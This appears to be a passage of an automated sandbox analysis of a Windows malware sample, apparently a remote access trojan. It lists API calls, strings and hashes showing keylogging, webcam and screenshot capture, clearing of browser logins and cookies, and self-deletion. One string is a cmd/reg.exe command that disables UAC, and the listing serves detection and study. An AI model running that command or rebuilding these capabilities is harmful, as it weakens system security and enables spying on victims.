                      • API ID: Service$CloseHandle$Open$ControlManager
                      • String ID:
                      • API String ID: 221034970-0
                      • Opcode ID: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
                      • Instruction ID: 4eedda638a80435df945b1a666cb81191fe5a480f3a20e792e67f186b8beea13
                      • Opcode Fuzzy Hash: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
                      • Instruction Fuzzy Hash: 16F0F6315403187BD211AF65DC89DBF3B6CDB45B92F00002AFD0593192DF28CE4596F9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00415EB6,00000000), ref: 00416585
                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00415EB6,00000000), ref: 00416599
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165A6
                      • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00415EB6,00000000), ref: 004165B5
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165C7
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165CA
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Service$CloseHandle$Open$ControlManager
                      • String ID:
                      • API String ID: 221034970-0
                      • Opcode ID: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
                      • Instruction ID: f156ac7e468d3ae20af57b6ed191c57fcc92838d981ab40ed78c867a72fe8b74
                      • Opcode Fuzzy Hash: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
                      • Instruction Fuzzy Hash: 6DF0C2315413187BD211AF65EC49EBF3BACDB45B92B00002AFE0992196DA38CE4596E9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00414906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
                        • Part of subcall function 00414906: CreateCompatibleDC.GDI32(00000000), ref: 0041492D
                      • SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004157C7
                        • Part of subcall function 0041441B: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00414431
                        • Part of subcall function 00414493: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004144A4
                        • Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D8E), ref: 004179F9
                      • DeleteFileW.KERNEL32(00000000,0000001B), ref: 00415858
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Create$File$GdipImageStream$CompatibleDeleteFromLoadSave
                      • String ID: dat$image/png$png
                      • API String ID: 1095564277-186023265
                      • Opcode ID: 294e0575d5c3f3df68874ed8cc6bd497170dbf286b6d4102a3bd0dde0a790e21
                      • Instruction ID: 0c36451510116b7bd957a4aa3b7b106e47bf9e8d8c5c7fe72891902c2c8ac275
                      • Opcode Fuzzy Hash: 294e0575d5c3f3df68874ed8cc6bd497170dbf286b6d4102a3bd0dde0a790e21
                      • Instruction Fuzzy Hash: 304172711183409BC314FB62C852EEFB3A9AF95358F00093FF446671E2EF385A48C69A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateThread.KERNEL32 ref: 004087CA
                      • CreateThread.KERNEL32 ref: 004087DA
                      • CreateThread.KERNEL32 ref: 004087E6
                        • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                        • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                        • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CreateThread$EventLocalTimewsprintf
                      • String ID: Offline Keylogger Started$[Info]
                      • API String ID: 3534694722-3531117058
                      • Opcode ID: 9351ce93166e5919873b59e2be7c86dd049733ec4517a2a82178660fdbeb4b66
                      • Instruction ID: e7dd77b1288fa42652556686635590a3b19cb298011fac88deeca58e0b290907
                      • Opcode Fuzzy Hash: 9351ce93166e5919873b59e2be7c86dd049733ec4517a2a82178660fdbeb4b66
                      • Instruction Fuzzy Hash: 5711A7B21003083AD214B6668D86DBB3A5CDA9139CB40053FF985221D3EE785E59C6FA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                        • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                        • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                        • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                      • CreateThread.KERNEL32 ref: 0040942D
                      • CreateThread.KERNEL32 ref: 00409439
                      • CreateThread.KERNEL32 ref: 00409445
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CreateThread$LocalTime$Eventwsprintf
                      • String ID: Online Keylogger Started$[Info]
                      • API String ID: 3546759147-3401407043
                      • Opcode ID: a2041c6c2a2a3a2c9e5274fc0c7bccf85df625937437c628581770fe62eddfb0
                      • Instruction ID: 55f70c683c1dd9f299002b3fa9371d2aabc85af949f207a7a15db3bb5bde523d
                      • Opcode Fuzzy Hash: a2041c6c2a2a3a2c9e5274fc0c7bccf85df625937437c628581770fe62eddfb0
                      • Instruction Fuzzy Hash: 5501C8A16002193AD62476764C86DBF7A6CCA81398F80057FFA85321C3D97D5C4A82FA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateProcessA.KERNEL32 ref: 0040D43B
                      • CloseHandle.KERNEL32(0040C5FB), ref: 0040D44A
                      • CloseHandle.KERNEL32(00000027), ref: 0040D44F
                      Strings
                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D431
                      • C:\Windows\System32\cmd.exe, xrefs: 0040D436
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseHandle$CreateProcess
                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                      • API String ID: 2922976086-4183131282
                      • Opcode ID: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
                      • Instruction ID: 26fca9c7a1bbdca23175ff39a315bbad59b3fabc2693cff21f74514230984448
                      • Opcode Fuzzy Hash: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
                      • Instruction Fuzzy Hash: BDF012B290061C7FEB105AE9DC85EEFBB6CEB48795F100476F604E6011D5715D148AA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00405196), ref: 004051B1
                      • CloseHandle.KERNEL32(?), ref: 00405207
                      • SetEvent.KERNEL32(?), ref: 00405216
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseEventHandleObjectSingleWait
                      • String ID: Connection timeout$[WARNING]
                      • API String ID: 2055531096-1470507543
                      • Opcode ID: 8b6936126bbdbf1623cb9cbc7df53c6cf8ce2eb3c326d1d004a7b873d990a03d
                      • Instruction ID: 7da91c5eb563825218e032d44bddc69cdf30f244b65d1975d56df2ebc3a46463
                      • Opcode Fuzzy Hash: 8b6936126bbdbf1623cb9cbc7df53c6cf8ce2eb3c326d1d004a7b873d990a03d
                      • Instruction Fuzzy Hash: B801B131A41B40AFC721AF75884651BBBA4EF0530A700447EE5C3A6AA2CBB89404CF9A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041271D
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ExecuteShell
                      • String ID: /C $8E@$cmd.exe$open
                      • API String ID: 587946157-914314769
                      • Opcode ID: 7aa96fee03e6401ac1b22889eba9856a68264f954b39489df8aa8793d1cc152a
                      • Instruction ID: 47ea0f4151d847ad7c85bc2547405b4448f03a7c8d467b7d431ad20f766adf74
                      • Opcode Fuzzy Hash: 7aa96fee03e6401ac1b22889eba9856a68264f954b39489df8aa8793d1cc152a
                      • Instruction Fuzzy Hash: 6BF036711183415BC204FB72D8919BFB3A9AB90309F10083FB946A20E3EF385919865E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040B836
                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040B875
                        • Part of subcall function 004303A0: _Yarn.LIBCPMT ref: 004303BF
                        • Part of subcall function 004303A0: _Yarn.LIBCPMT ref: 004303E3
                      • std::bad_exception::bad_exception.LIBCMT ref: 0040B88D
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040B89B
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                      • String ID: bad locale name
                      • API String ID: 3706160523-1405518554
                      • Opcode ID: e4434316a2aa22c80a8ecccf78aeb5c6b4e9cbfc58a69b48d55e7b8d31bdf15a
                      • Instruction ID: 089b12ecbc6339823181e46ec4ed0a9302f8c45fa17c933d22815baa8faf1e53
                      • Opcode Fuzzy Hash: e4434316a2aa22c80a8ecccf78aeb5c6b4e9cbfc58a69b48d55e7b8d31bdf15a
                      • Instruction Fuzzy Hash: 1DF031318042086BC228FAA5ED57A9A7374AF14754F50463FF946224D1EF7CB54DC68D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4f3e5902103fbf73d685bb82c023768945668d30e32b5126960101710bc94102
                      • Instruction ID: 0e8ff1e7bf94726707b95a2ea2eb2a738027cd1da7e878330fc773e679c7ecaa
                      • Opcode Fuzzy Hash: 4f3e5902103fbf73d685bb82c023768945668d30e32b5126960101710bc94102
                      • Instruction Fuzzy Hash: 5171D231900216ABCF21CF59C884BBFBB75EF59324F14222BEA1167282D7789D41C7E9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 004028D8: std::_Xinvalid_argument.LIBCPMT ref: 004028DD
                      • Sleep.KERNEL32(00000000,?), ref: 004045DB
                        • Part of subcall function 0040471E: __EH_prolog.LIBCMT ref: 00404723
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: H_prologSleepXinvalid_argumentstd::_
                      • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                      • API String ID: 834325642-3547787478
                      • Opcode ID: 7417a0c5ab63d1e5e224628f01b3af9e13e40c54480966dc25f5329f4d926a97
                      • Instruction ID: 36a5e228549547fe3264f4e150403a2e0a3e3e2746ad4685d8a770f54e79c9b4
                      • Opcode Fuzzy Hash: 7417a0c5ab63d1e5e224628f01b3af9e13e40c54480966dc25f5329f4d926a97
                      • Instruction Fuzzy Hash: 6651E4B1604200ABCA05BB769D0A66E3B559BC5308F00443FF905BB7E2EF7D8945879E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 0040F14A: SetLastError.KERNEL32(0000000D,0040F6C6,00000000,00000000,0040AF7B), ref: 0040F150
                      • SetLastError.KERNEL32(000000C1,00000000,00000000,0040AF7B), ref: 0040F6DD
                      • GetNativeSystemInfo.KERNEL32(?,00000000,00000000,0040AF7B), ref: 0040F750
                      • GetProcessHeap.KERNEL32(00000008,00000040), ref: 0040F7BC
                      • HeapAlloc.KERNEL32(00000000), ref: 0040F7C3
                      • SetLastError.KERNEL32(0000045A), ref: 0040F8D5
                        • Part of subcall function 0040F65A: VirtualFree.KERNEL32(00008000,00000000,00000000,?,0040F7DC,00000000,00000000,00008000,00000000), ref: 0040F666
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
                      • String ID:
                      • API String ID: 486403682-0
                      • Opcode ID: eb120fceeea753676480937062db3c536b07788e457956489b4c9a7f2f50d659
                      • Instruction ID: 31fca79699fb41a21c899f6cb63a77230b732fc93c9d9a7c568002a0e8237c26
                      • Opcode Fuzzy Hash: eb120fceeea753676480937062db3c536b07788e457956489b4c9a7f2f50d659
                      • Instruction Fuzzy Hash: 66610771A00201ABCB30AF65CC81B6A77A5BF44744F14403AE804BBBC1D77CED4ADB99
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                      • _free.LIBCMT ref: 0043E65B
                      • _free.LIBCMT ref: 0043E672
                      • _free.LIBCMT ref: 0043E691
                      • _free.LIBCMT ref: 0043E6AC
                      • _free.LIBCMT ref: 0043E6C3
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free$AllocateHeap
                      • String ID:
                      • API String ID: 3033488037-0
                      • Opcode ID: 0e44e192ae9f7449bc2dcdd52dfacc8fa8f025cb327802adf5d2bcb5333049c9
                      • Instruction ID: 9ca46151fc1eb59705b8745a81b868f81510b806d69f04cfdfe39fc5a4c1e60e
                      • Opcode Fuzzy Hash: 0e44e192ae9f7449bc2dcdd52dfacc8fa8f025cb327802adf5d2bcb5333049c9
                      • Instruction Fuzzy Hash: 2C51E371A02304AFDB20DF2BC842B6A77F4EF5C724F54156EE909D7290E739D9018B88
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: _free
                      • String ID:
                      • API String ID: 269201875-0

                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A), ref: 004493F9
                      • __alloca_probe_16.LIBCMT ref: 00449431
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?), ref: 00449482
                      • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?,00000002,?), ref: 00449494
                      • __freea.LIBCMT ref: 0044949D
                        • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                      • String ID:
                      • API String ID: 313313983-0

                      Strings
                      • [Cleared browsers logins and cookies.], xrefs: 0040A5FB
                      • Cleared browsers logins and cookies., xrefs: 0040A60C
                      • [Info], xrefs: 0040A61B
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: Sleep
                      • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[Info]
                      • API String ID: 3472027048-899236412

                      APIs
                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F724,00000000,00000000,?,0040B0BC,00000000,00000000), ref: 00417986
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179A2
                      • CloseHandle.KERNEL32(00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179AE
                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179C0
                      • CloseHandle.KERNEL32(00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179CD
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: File$CloseHandle$CreatePointerWrite
                      • String ID:
                      • API String ID: 1852769593-0

                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 004475E3
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00447606
                        • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044762C
                      • _free.LIBCMT ref: 0044763F
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044764E
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                      • String ID:
                      • API String ID: 336800556-0

                      APIs
                      • _free.LIBCMT ref: 0043D8DA
                        • Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                        • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                      • _free.LIBCMT ref: 0043D8EC
                      • _free.LIBCMT ref: 0043D8FF
                      • _free.LIBCMT ref: 0043D910
                      • _free.LIBCMT ref: 0043D921
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0

                      APIs
                      • _strpbrk.LIBCMT ref: 004469B8
                      • _free.LIBCMT ref: 00446AD5
                        • Part of subcall function 0043698A: IsProcessorFeaturePresent.KERNEL32(00000017,0043695C,00000000,00000000,?,0046C518,0040D10E,00000000,?,?,0043697C,00000000,00000000,00000000,00000000,00000000), ref: 0043698C
                        • Part of subcall function 0043698A: GetCurrentProcess.KERNEL32(C0000417), ref: 004369AE
                        • Part of subcall function 0043698A: TerminateProcess.KERNEL32(00000000), ref: 004369B5
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                      • String ID: *?$.
                      • API String ID: 2812119850-3972193922

                      APIs
                        • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                        • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                        • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                        • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                      • CloseHandle.KERNEL32(?), ref: 00409581
                      • UnhookWindowsHookEx.USER32 ref: 00409594
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
                      • String ID: Online Keylogger Stopped$[Info]
                      • API String ID: 3650414481-1913360614

                      APIs
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C119
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: Exception@8Throw
                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                      • API String ID: 2005118841-1866435925

                      APIs
                      • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,0046C578,?), ref: 00410978
                      • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 00410993
                      • RegCloseKey.ADVAPI32(00000000), ref: 0041099C
                      Strings
                      • http\shell\open\command, xrefs: 0041096E
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID: http\shell\open\command
                      • API String ID: 3677997916-1487954565

                      APIs
                      • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013B7
                      • GetProcAddress.KERNEL32(00000000), ref: 004013BE
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: AddressHandleModuleProc
                      • String ID: GetCursorInfo$User32.dll
                      • API String ID: 1646373207-2714051624

                      APIs
                      • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00401472
                      • GetProcAddress.KERNEL32(00000000), ref: 00401479
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetLastInputInfo$User32.dll
                      • API String ID: 2574300362-1519888992

                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 0040148F
                      • GetProcAddress.KERNEL32(00000000), ref: 00401496
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetConsoleWindow$kernel32.dll
                      • API String ID: 2574300362-100875112

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: __alldvrm$_strrchr
                      • String ID:
                      • API String ID: 1036877536-0

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: _free
                      • String ID:
                      • API String ID: 269201875-0

                      APIs
                        • Part of subcall function 00417ABF: GetForegroundWindow.USER32(75146490,?), ref: 00417ACF
                        • Part of subcall function 00417ABF: GetWindowTextLengthW.USER32(00000000), ref: 00417AD8
                        • Part of subcall function 00417ABF: GetWindowTextW.USER32 ref: 00417B02
                      • Sleep.KERNEL32(000001F4), ref: 00408AAF
                      • Sleep.KERNEL32(00000064), ref: 00408B49
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: Window$SleepText$ForegroundLength
                      • String ID: [ $ ]
                      • API String ID: 3309952895-93608704

                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0046C518,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue), ref: 00442065
                      • GetLastError.KERNEL32(?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000,00000364,?,00441DB4), ref: 00442071
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000), ref: 0044207F
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID:
                      • API String ID: 3177248105-0

                      APIs
                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D8E), ref: 004179F9
                      • GetFileSize.KERNEL32(00000000,00000000,?,?,00408D8E), ref: 00417A0D
                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00408D8E), ref: 00417A32
                      • CloseHandle.KERNEL32(00000000,00408D8E), ref: 00417A40
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: File$CloseCreateHandleReadSize
                      • String ID:
                      • API String ID: 3919263394-0

                      APIs
                      • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041768D
                      • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 004176AF
                      • CloseHandle.KERNEL32(00000000), ref: 004176BA
                      • CloseHandle.KERNEL32(00000000), ref: 004176C2
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: CloseHandle$FileModuleNameOpenProcess
                      • String ID:
                      • API String ID: 3706008839-0

                      APIs
                        • Part of subcall function 00414906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
                        • Part of subcall function 00414906: CreateCompatibleDC.GDI32(00000000), ref: 0041492D
